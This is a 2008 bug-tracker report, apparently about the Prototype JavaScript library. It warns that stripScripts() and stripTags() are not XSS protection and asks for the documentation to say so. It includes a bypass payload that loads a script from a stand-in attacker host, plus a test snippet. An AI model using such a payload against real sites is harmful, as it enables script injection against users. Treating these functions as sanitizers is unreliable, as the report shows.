#102 doc
Vincent Caron

String.stripStrings() and stripTags() potentially unsafe

Reported by Vincent Caron | May 15th, 2008 @ 01:40 PM | in Inline documentation

I recently encountered a case where a developer thought he would be safe by running stripScripts().stripTags() on his strings before inserting them in the DOM.

However, these functions use very simple regexes, and most importantly will let a few < or > out. For instance you can trick stripScripts().stripTags() with the string "</<script src=http://haxor.com/owned.js" (without the double quotes), which Firefox 2 will happily execute. Test with:

var txt = '</<script src=http://haxor.com/owned.js';
if ( txt == txt.stripScripts().stripTags() ) alert('XSS passed thru');

IMHO it will be quite complicated to properly handle all flavours of tag soups which will be greedily interpreted by the major browsers. And a regex might not be up to the job.

I guess a proper solution would be to notify stripScripts() and stripTags() users in the documentation that these methods only try to do their best, and that the output must not be trusted since it may contain < and > characters.

The current documentation (1.6.0.2) does not pretend that stripping is actually a security measure (it's an aesthetic one IMHO), it does not mention security at all. But in my experience, many programmers feel they are XSS-safe as soon as they see the magical "strip" word (though they should think "escape").

As for now, "Strips a string of anything that looks like an HTML script block" and "Strips a string of any HTML tag" are actually untrue and misleading.
